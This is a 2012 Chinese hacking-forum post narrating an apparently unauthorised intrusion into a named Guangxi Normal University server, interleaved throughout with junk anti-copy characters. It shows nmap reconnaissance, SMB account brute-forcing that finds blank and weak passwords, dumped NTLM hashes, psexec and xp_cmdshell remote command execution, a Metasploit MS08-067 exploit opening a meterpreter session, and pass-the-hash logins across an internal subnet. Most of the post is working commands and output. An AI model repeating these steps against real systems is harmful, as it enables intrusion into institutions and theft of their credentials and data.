中国网络渗透测试联盟

标题: nmap+msf入侵广西师范 [打印本页]
作者: admin    时间: 2012-12-4 12:46
标题: nmap+msf入侵广西师范
广西师范网站http://202.103.242.241/! F' T9 @) m3 I

/ p: y3 F2 c1 a) Xroot@bt:~# nmap -sS -sV 202.103.242.241
  K" o. y5 i! O
! _: e% h8 h# N& q8 e+ P, z7 V. sStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST: i/ B0 z5 ^, E# a2 g, b5 p, r

6 R# c) D2 }7 o: Y+ k' wNmap scan report for bogon (202.103.242.241)
9 t( Z$ ]# h1 c) L, M# `2 n% r
9 s, A1 d- ^9 c- E  t/ V, p! ?9 {Host is up (0.00048s latency).7 ?% P& o$ T( t0 U# e

' D+ S* e5 j; B. K" ONot shown: 993 closed ports; O3 U3 X5 @/ \. p
% D% ?+ w- Z" I! z5 N4 I1 H
PORT     STATE SERVICE       VERSION; U$ o3 L: q% B! z* W- b

; W2 K4 H" ?6 c9 u9 O4 u7 t135/tcp  open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
) C! f5 q! S3 {- V& r
+ |8 @3 O: P# k: B, d/ j139/tcp  open  netbios-ssn3 k. ?* V1 p, v7 I& X8 ^3 D
% d1 Q% ]/ U% Z" _
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds6 G) Q' y/ |/ y

% \! V) P- E, y2 l: b1025/tcp open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)1 L& w' k5 W+ c

( F* b3 u% `2 x9 J5 M1026/tcp open  msrpc         Microsoft Windows RPC& e& `& L0 J0 x5 ?) l

5 S# e5 M+ @9 w2 H" f1 X8 O3372/tcp open  msdtc?6 p: A: {7 `2 `% K- A% m
' a  x) ]# [* m7 p+ T% t
3389/tcp open  ms-term-serv?& Y2 V! P* @+ M& v

* l  F$ w$ z* `1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
3 l3 V% |1 n6 y$ M; o$ C9 n! d6 cSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r  F) _" f" m+ c8 ]9 H, \& |

2 A2 T$ c) d) S1 r& n# [SFGetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
( C: @6 S2 F% C. M
* t6 {; Q, x& w0 K( ^& q* K; uSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)1 o+ C$ w9 T6 h+ e

8 ?2 v6 Y" h8 l) v6 wSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO' @6 U( ?1 v5 y$ |  Z
- c' P; I/ k. y  N
SF:ptions,6,”hO\n\x000Z”);6 `0 c9 J4 b6 `" Z7 M6 @. [) K* z

, a9 P$ g& d- hMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems), H$ L0 K+ @$ z) U

7 m$ d! y4 w+ F/ F+ `# C; mService Info: OS: Windows; w& |/ Z  b, h% B0 t
' K" ^! o# i- a* e( D; N
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
0 h& T  _3 V7 q1 p/ h2 O
8 k/ H/ L7 [- h- d- |# O1 a- dNmap done: 1 IP address (1 host up) scanned in 79.12 seconds' H: O( u: A& C! `( u

0 }  u  Y9 ]% y: d/ |* }/ M# @root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  //列出扫描脚本
! J  q$ c; t# I0 {
( h/ {1 ]' V# D8 s" Z-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
8 l8 J+ \$ ^$ H. u& S6 {' ?6 {$ x* ^5 \. ^8 S% `3 ?! G
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
9 A( f/ D& p( }' D" Y$ k( F+ x6 h) X% P1 \
-rw-r–r– 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
0 Y! q/ [! J" d7 J5 u. l1 P1 Q: k' S* @# y$ @; R# k! ~
-rw-r–r– 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
0 ]/ R8 {) C8 n/ q! |* I% O: T5 H
-rw-r–r– 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse- t1 x' k4 P$ x( J5 a) J

/ K7 b0 Q: q# l& \-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
* i  U$ ]4 F$ n1 g3 k+ c, {1 [# y- i1 w1 D8 a
-rw-r–r– 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse/ G' @9 L/ |) O6 @+ S
+ ^0 @' W5 F& c% P6 M+ d4 M4 Z6 K! b
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse' M5 L' i0 n, F/ C# E, ]

& I( W" Z/ S9 l+ @' [9 x-rw-r–r– 1 root root  1658 2011-07-09 07:36 smb-flood.nse+ [* h3 @9 z2 V4 ], k( ~
7 M* F& W" G' a( I
-rw-r–r– 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse2 V* f% e2 b' N' N

6 n! \, Y2 U, t5 ~$ k6 h  h# m: A-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
& F9 G+ n9 q) @8 \) p
( T' i: j' t, `! ~3 z1 X-rw-r–r– 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
* q: ]/ p* h  e1 X4 b9 g- _3 d) t- y
# h$ F: b2 q% C-rw-r–r– 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse# m( D; L2 d. S# L) W

1 m; r" R  n( u  B-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse; x4 l4 M) h' H4 ^$ [6 }

4 O. G, w5 Z) [0 Y) P. m-rw-r–r– 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse) e, l" ]) B3 M7 J$ y: ]
! s% [8 n* N/ n! n$ `* M% a* T+ u
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241   
# Z0 k9 B8 z- z- _; Q6 ?
0 ~8 M2 B. ^! l: B3 x//此乃使用脚本扫描远程机器所存在的账户名
# {; _; g# ?* X5 }2 q# k& \' d8 W. g6 l1 G- V
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST5 P+ A$ z  F* A2 W* v7 i7 Y& R1 X' Y

' e; l% M) J% n+ p6 q  XNmap scan report for bogon (202.103.242.241)- e7 A# A  Q5 [8 D0 U6 c
8 u( Q+ J. O; x" w- f  k
Host is up (0.00038s latency).) w5 c! R5 @" u
, C  c9 B% x1 P1 Z$ J
Not shown: 993 closed ports
; j; K1 r, ~# K6 f7 [, e( y7 u
. A' N% W3 c8 z) h# g) s- z/ Q: c9 RPORT     STATE SERVICE7 v  I; J/ [/ Q: R, s' ?, Z
/ _3 M, Y& w3 ^9 D
135/tcp  open  msrpc
3 k# a* ^: U$ F3 r4 n; E9 d, F. H1 G/ e+ V$ T0 q+ _. S1 X
139/tcp  open  netbios-ssn. M0 U# Y0 @6 i2 z
! R' @5 ~* L  `1 B+ c
445/tcp  open  microsoft-ds
/ @/ v. E$ F$ }9 P' P& s5 H$ l
  V2 R# g0 f" c4 t1025/tcp open  NFS-or-IIS0 p/ @# d1 |- Q% o  U9 R7 W
2 I& c! R- O- Y9 o" b% u8 M
1026/tcp open  LSA-or-nterm
- {! f0 Y( y& z
: ~$ ]- x; x) N4 Z  r* V% C, y$ n4 m  c3372/tcp open  msdtc5 q) Q' T; a" R% S. G5 b

/ w  e2 u' h& V8 [$ g& P/ z3389/tcp open  ms-term-serv3 u( x3 J: b1 l8 S3 A  o' R3 `

5 J2 f, W) F- g4 {- xMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)$ q: C0 M/ J( V$ S. \% `/ c" p
2 h; d2 D& d; p0 G) c" ]
Host script results:" K% D/ L2 Q5 ~' B0 G

) F7 r, [8 |, }. A& j* S: X| smb-enum-users:; o' ^) D' q2 ?+ ]7 e

8 O# _2 ?; d; x2 j, |8 j9 x|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果5 k+ g. i1 g% D) H+ G6 o

  F+ K4 w) a* |. I( X. aNmap done: 1 IP address (1 host up) scanned in 1.09 seconds' O! m+ x) a; ]

7 G; q, h# d( w7 [/ a  W+ troot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
- R/ j1 f# [# x1 @6 S5 U  X1 s7 v& W: }+ _" a7 c- I
//查看共享
- @: A$ s+ H3 z3 i8 d
7 Y( G! {0 L3 p( v7 a; kStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST) I6 s. O+ T2 \1 U. k. k; s2 c

* k" i4 ^7 c) V4 n) X& y) b; g" wNmap scan report for bogon (202.103.242.241)
2 W$ N0 E6 F0 z6 \# P+ R* t: z6 {0 h9 ?# {2 B& L) U
Host is up (0.00035s latency).( N! o) H/ Q  G! N% {' O

  K* ~1 ~; A1 uNot shown: 993 closed ports4 g% j# Q* u% x# l

, z  S- s5 [( t$ `: p0 dPORT     STATE SERVICE
% W; Z, ?% H; |! e3 H- ?) l# h2 r2 Q+ q+ N/ m& B# e
135/tcp  open  msrpc/ d6 K& C( V  l4 G( [/ n1 T

' j2 I2 M/ K4 \139/tcp  open  netbios-ssn
! R+ i: h2 t# J/ m6 K3 T! A6 P% q0 o/ q9 b9 W+ g0 y6 J
445/tcp  open  microsoft-ds; ]4 w' O: l: c9 P- P8 K

/ C( s# w. `4 r8 A! _1025/tcp open  NFS-or-IIS# j) T+ M' g6 y; Y7 t3 |8 B* n
/ C5 m9 }- B+ ^; w' J7 d4 L# n0 q
1026/tcp open  LSA-or-nterm6 B+ a0 y9 K& o/ T* N* x

0 H: q+ K/ ^/ {* t! X) C5 n3372/tcp open  msdtc, C0 r0 I- Z1 w  t6 [

9 i, s  T# Q4 N4 w2 q, k; F, h3389/tcp open  ms-term-serv
& Y2 g7 F$ l) g* M: s0 S
9 M% Y& r3 E9 |8 WMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
1 z# z) E* c. I: |/ u: s
0 }9 Q: P* i! t: Q) ^( L& W4 E/ U- v# BHost script results:
+ e, ]! c3 S. M6 _2 a$ `, o( J, f! Y  X$ e: K8 V3 V" A$ |
| smb-enum-shares:
2 z6 T) q( Z! N! g; w+ r" [' o( A3 Q: i  Y1 v: J  p
|   ADMIN$
# T: d) l0 F7 s3 s- q) n. g2 Q" w4 ~
, ~- w% r2 T) D5 w|     Anonymous access: <none>% V0 @% }3 |) o! G6 J( g- p& M
" f3 s+ p2 a( N' ]
|   C$
' v1 k9 L2 r0 q" |4 f. R' S, m3 M/ {
|     Anonymous access: <none>
  ?8 q8 n  T3 L# r1 P' S3 R9 m! @
|   IPC$
0 h3 o# p* Y! Z- t" v8 `7 [# L6 B
* _0 r0 O* e  v" @( A2 E$ g7 d0 y|_    Anonymous access: READ4 A; R' ?8 |8 e  ]0 f) m" l

3 {( Q8 Y& S( }5 w$ R8 JNmap done: 1 IP address (1 host up) scanned in 1.05 seconds( R  p* U5 t" m! W
3 _9 C3 H; e9 l  C
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241      
9 F3 z3 z% t, `6 T
2 R" o1 W& t4 y  v9 |- y* ]8 Y//获取用户密码
7 ^; T" Z5 o. j. {% I# y
" s, Y) W- b, J" E% uStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
6 o4 a1 h7 Z7 O/ s
# J# K, o2 _) w( ?. ZNmap scan report for bogon (202.103.242.2418)
; ^. ]% w' w6 c6 b
3 }8 _( K& @5 Y: OHost is up (0.00041s latency).1 y7 s9 `/ @) Z0 T

* X& ?/ j: N! GNot shown: 993 closed ports& e7 D; h( L' X# ]
1 Z# ]+ W& t% }% X0 f+ \4 V
PORT     STATE SERVICE3 C: ?9 Z9 W: r
" X% \9 t7 M; c: \. `
135/tcp  open  msrpc
! o$ U) k; P6 u3 V* f# D$ E) v! _* n- o+ N
139/tcp  open  netbios-ssn" p2 E: P; Y0 n0 t/ @+ a8 f8 c

# @. ~9 _/ Q! H445/tcp  open  microsoft-ds
: A( `- A3 ]! ~! A! K* ]" }6 A7 b! `: \" N0 \6 v3 _
1025/tcp open  NFS-or-IIS) |1 z# M5 M2 ]3 p& B5 @
1 S5 T: ]  `6 g- `, P- E
1026/tcp open  LSA-or-nterm. D. T1 @2 }, r: b, {
) U" m0 H3 [! ^+ p  _
3372/tcp open  msdtc* T3 i6 e/ Y! x. }
! D0 q7 b: w( L9 c) w. n) L4 T
3389/tcp open  ms-term-serv
7 G, b5 i1 f$ }
2 B: I! C+ u4 p& F' E: Q* x' CMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)/ L5 Y! e' z) i  c' b
+ n: ~: @2 W" X, ]8 [/ C" j
Host script results:- g5 b, \8 w8 r( h

$ N* }3 v+ s9 x! `/ I& P) d) p; || smb-brute:
6 Y% r! Y7 j! M
5 H: Y, u: A/ U8 Qadministrator:<blank> => Login was successful
- {/ \+ J6 Z9 a( m! Y# A  [& Y3 B4 @5 E- v7 e4 t% H
|_  test:123456 => Login was successful
/ n! p) d$ i. Z# Q" H* L, F6 M$ R. I5 S+ t
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
+ G: Y' x) z# |( T1 G# I
& B1 k+ ~) I6 H+ f! K9 Groot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash1 ^0 i1 r6 G9 e! \4 ^8 u! }3 F8 P3 J
' r/ S5 b  ?3 l; d2 r+ k
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
: f2 |! |2 f9 M& I, W8 W$ v
" x0 ^6 ?, X  F3 _root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse1 x/ S# G; |9 O. }/ d% f$ ~. U
% b2 H0 L: a- k) f
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1390 ^3 J5 r) U" W

' N& C& I. D1 j. s, @0 Q: EStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
; N' x4 w0 ~( S# ~: v
  Z2 ^: h- [: A0 DNmap scan report for bogon (202.103.242.241)& {7 C) ]5 r" L$ f

# U2 t5 N5 o- U9 z7 E: EHost is up (0.0012s latency).% t# A" F3 Y! g1 v% d9 ^
  }) S2 L1 `6 ?; {. m8 A6 `5 F
PORT    STATE SERVICE- d: u* n' N+ O4 \2 v2 }8 u
! R5 V( p; C( W8 h8 I$ T9 C
135/tcp open  msrpc& F) V% _) S& I" l

! F' P' D9 J3 h' `5 I139/tcp open  netbios-ssn
, G' W, o$ D2 e2 H- i5 Z. |5 r: t
; Z4 y6 _' `3 u/ K# V445/tcp open  microsoft-ds7 R  q- U& V$ s& Z

  u: {) j$ _, b9 y9 i- F( EMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)* d1 c# S, l( |8 i/ C* l
! ]7 [: U% y2 z2 `* b
Host script results:
! w0 D, A/ j7 B: X6 }% B* b3 d( ~# Z
| smb-pwdump:
$ G" _  x) p" k
% H  ~+ `  p3 ^: k| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
/ b; g2 |3 [# y6 U  o& ^: j
. x7 W) Y: u# B| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
9 L) `( z9 Y+ c: |! U  V& R9 E0 Y9 R" F
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D41 x- w  f$ q. ~2 }  z1 M

5 x' U2 E8 B, o6 Q& I& Y- B|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
) U# Y6 N# ~7 d6 L
' y7 d0 z' _" A  ]0 r! A$ wNmap done: 1 IP address (1 host up) scanned in 1.85 seconds
" X7 P8 R  H9 j' i
' |5 E5 L/ p. c5 {C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241  -u test             //获取一个cmdshell# z. |+ o/ p8 E0 A" Y5 F

! `+ t( y* P, W3 N' u-p 123456 -e cmd.exe, Y7 ^9 l7 Q( B& D
2 |+ t1 e; Y0 C5 k- `: e3 b# ^% K
PsExec v1.55 – Execute processes remotely, ^2 k9 f1 L. \# y2 a2 u
8 _+ \9 Y& ]6 n1 v1 j& l
Copyright (C) 2001-2004 Mark Russinovich! d$ F" G' G4 k5 K

" U# m  J9 ]/ y) j$ L$ uSysinternals – www.sysinternals.com
/ X) k1 i9 i) d/ f! ], X* E/ j' B/ u$ A( ?
Microsoft Windows 2000 [Version 5.00.2195]( M0 _) l$ G/ f: u% h  @. v$ d

5 D6 z  K  L( C. [4 @0 t(C) 版权所有 1985-2000 Microsoft Corp./ i0 u: J% N; v9 g5 ]% k* \5 R

0 a# M9 X6 e" O. `C:\WINNT\system32>ipconfig" p; a- z0 \/ r4 m

3 Z6 t1 m: a+ X6 o5 K% ^# p( U+ vWindows 2000 IP Configuration
0 c" Z, `" j- u" v' N1 s. s/ ^+ c. j# C  W/ s6 R% q
Ethernet adapter 本地连接:. [* |  J9 L. O$ X0 s. j! d& b
* V- m( x2 S) x: Y" m1 X
Connection-specific DNS Suffix  . :+ ]/ W! n( V8 s/ R: |3 q8 F3 _
! N! I5 ~6 `; W7 T) U3 ]
IP Address. . . . . . . . . . . . : 202.103.242.241: N6 S/ Q* M0 P; q3 {' x- c

3 o6 J3 p+ D8 _( U- B/ S) t# o; OSubnet Mask . . . . . . . . . . . : 255.255.255.0
6 ]$ \+ K. e7 j& T
* {! o- v7 P' P  Z; W- R& ODefault Gateway . . . . . . . . . : 202.103.1.1
9 ?& ?  L( m4 d2 b4 @, ^
8 h! E4 h  d3 O1 f2 PC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “   //远程登录sa执行命令
. N6 H3 o: a+ T* R+ ~( B8 n+ k
, t7 g) ~9 Q! p% a% P* uroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241     //检测目标机器漏洞' Y5 I0 p: v$ d! A

$ S1 Q' |7 D5 I4 F6 z$ r+ w7 K9 sStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST: }5 ]1 h8 x1 P# F9 o6 f2 J$ d
! k. v1 o3 a, h- T8 B; D5 x
Nmap scan report for bogon (202.103.242.241)$ [" a+ q! @" Q2 G. n& t; h

0 }7 r, J0 X4 p" iHost is up (0.00046s latency)." L& _9 ?5 }! u! x) C8 T9 U

0 C3 k4 y6 y- A5 o7 ~/ HNot shown: 993 closed ports5 ?  j- y3 I% v, ?/ p# K

( ?! R% ^. J" N2 W9 m. s- ZPORT     STATE SERVICE0 v9 K0 {  k3 @0 s/ u9 o

9 j, {: e9 d- o' E: E0 H8 }135/tcp  open  msrpc. r! A; r. b  l$ i- y

7 N3 V0 Q! f; d139/tcp  open  netbios-ssn
) ~  h- y# \" u
  _( Z  N& A' f9 O+ v445/tcp  open  microsoft-ds
7 I9 d& Y& s2 ^+ I6 j/ H4 t3 N$ E/ v/ y
1025/tcp open  NFS-or-IIS1 k5 I$ E' C& ^( t# Z  p
% [. p0 s7 q+ h+ l. e
1026/tcp open  LSA-or-nterm
4 K1 j) d0 A3 r: r7 B: d& j1 `- y4 I# {6 ^7 c# A9 O$ p6 G* V' |
3372/tcp open  msdtc
8 h/ n7 V$ J9 _1 C9 [1 ~( R( M4 y; @, D2 x  F
3389/tcp open  ms-term-serv* q4 c, Q2 H- M& l9 Y. h# E) b: W: f
. _  M+ m9 e, k1 C* m# Q
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)2 n. c+ ~- t/ G8 ?3 d3 G

. R* s4 y: R4 hHost script results:  A  f1 X/ l1 z* D/ W
/ _8 i, l% b3 ?1 P  \
| smb-check-vulns:: f  D% n/ U* K2 Q$ u

) K3 m1 E; f" X* w2 A* {7 _2 }|_  MS08-067: VULNERABLE
) z! i, S7 Z+ c9 a0 C1 f; Y; ~7 x' J) n7 z
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds2 g6 v9 r5 f3 p! k4 F

' f& R" r: O/ g) U9 N" Y# [% Broot@bt:~# msfconsole                                             //在msf上利用ms08-067漏洞对目标机器进行溢出
/ j8 w1 W  C$ U) k+ G+ j
$ d1 Q4 h0 W% c2 J2 Z, L- P; {msf > search ms082 p5 m8 Z2 s( A% W3 q; U8 j: J

1 F) Z/ k! p' c& v& ^% kmsf > use exploit/windows/smb/ms08_067_netapi; g* R1 t: u. @4 k/ j
7 l: t/ R/ }7 x$ S! G
msf  exploit(ms08_067_netapi) > show options7 ?7 J2 \. E0 d9 D. s, {4 Q% C5 T
  d- |* j; x% ^( F# x
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241: `- |% u9 @3 P$ ^; b0 p; H

! V5 L, }! Z# ymsf  exploit(ms08_067_netapi) > show payloads! J# t  P5 y9 K$ y( y  o

- L: x8 i, a( d( J0 O8 J- Emsf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
) X9 V- u9 u3 r! ]3 J0 N. n: Y5 y" D( h% Q6 |4 C; E
msf  exploit(ms08_067_netapi) > exploit8 J$ N$ b! I- A$ d
3 b9 l% Q9 F5 w6 ]3 [
meterpreter >) D. C2 R7 \. m$ [$ b8 F: A1 L1 c
1 v5 t! ?9 C6 o0 c1 v% I
Background session 2? [y/N]  (ctrl+z)0 D' K3 B7 O+ S

7 V# |6 g8 o+ R+ n  F5 `! `1 @2 Rmsf  exploit(ms08_067_netapi) > sessions -l
$ Y+ A& h7 ^7 J; S' h' p6 a( d8 b* w! b! f
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt" ]' I9 J# w0 h" J" G. [
6 D9 Q: x& t$ G: s: }, ^7 q. ]) `
test
. M# ]; M5 o# m% B9 D/ v
. S+ |# o+ L/ J: C' R$ y0 N1 tadministrator
% h1 y8 _2 I6 D7 h$ _6 T( u3 D. o  ]; N6 [! E& R" g: ^& J& S
root@bt:/usr/local/share/nmap/scripts# vim password.txt$ x2 |4 q. L4 ], k" S, N
( m9 S9 @6 v6 I+ j3 X5 y
44EFCE164AB921CAAAD3B435B51404EE3 e4 F; ^" b+ {. t9 C" B: G
+ y$ _! |% `! R, y- w7 Y* f
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 7 R; N7 e+ P+ p
7 N6 S  n; k( l, y9 p
//利用用户名跟获取的hash尝试对整段内网进行登录
: _: a# M; x# j6 ]2 D9 _! p5 C2 L
6 t1 R: U# j$ `3 Y$ pNmap scan report for 192.168.1.105( L- u& w& ~8 e( A# H3 q

0 x2 ]8 T7 F) p, |' _. ]+ M5 hHost is up (0.00088s latency).
5 }3 Y3 b" r3 @4 J! q4 Q& G: a: @' {9 A" C/ z: o
Not shown: 993 closed ports0 `( q! p3 f5 x+ _- Q: R

- }; e& M  A% ~PORT     STATE SERVICE
5 E0 I7 j+ N3 i
) q6 A- c* D/ ~8 N+ Q) [135/tcp  open  msrpc
: z. O8 o+ J+ |8 O& L
8 |! V: P# E, e! C2 k; N139/tcp  open  netbios-ssn
/ g; J$ N' B0 v
  N9 A0 P9 {% h7 t* F+ N, b1 B8 L445/tcp  open  microsoft-ds
5 z9 ~: F; v" k( @8 \; ^+ b5 \2 h+ Z  P  c
1025/tcp open  NFS-or-IIS
* k, L& h: k# y: ~" y' o# b; D0 J/ E" T# k3 v; f/ q
1026/tcp open  LSA-or-nterm7 K7 W, ?  X. Z

' B& g/ M: D* O; s+ K3372/tcp open  msdtc
5 U+ t0 b2 T* W7 X& c: z2 p
2 i4 ?5 a/ e, {$ b. i% @* ?3389/tcp open  ms-term-serv3 |* q+ q8 D0 s2 r3 @' g

4 Z! H4 p8 r' G# pMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
4 y  I6 Z& ?* F2 g/ {4 g0 N3 b
2 z/ H' i6 m: e$ w+ f% m5 y# k2 j7 i! yHost script results:
% B( F3 Y3 S9 C, c+ m  J5 s& {; Y. p
| smb-brute:* {- o+ X0 J: `) j& m$ Y

/ O8 P" W$ Q5 C. v|_  administrator:<blank> => Login was successful! `% N- W# K# E' d! q$ a
0 c1 B& S9 I- {7 p) \
攻击成功,一个简单的msf+nmap攻击~~·
" d1 m( H& X6 F# u' E8 _# Y) p! F& R0 m7 B$ O# O




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2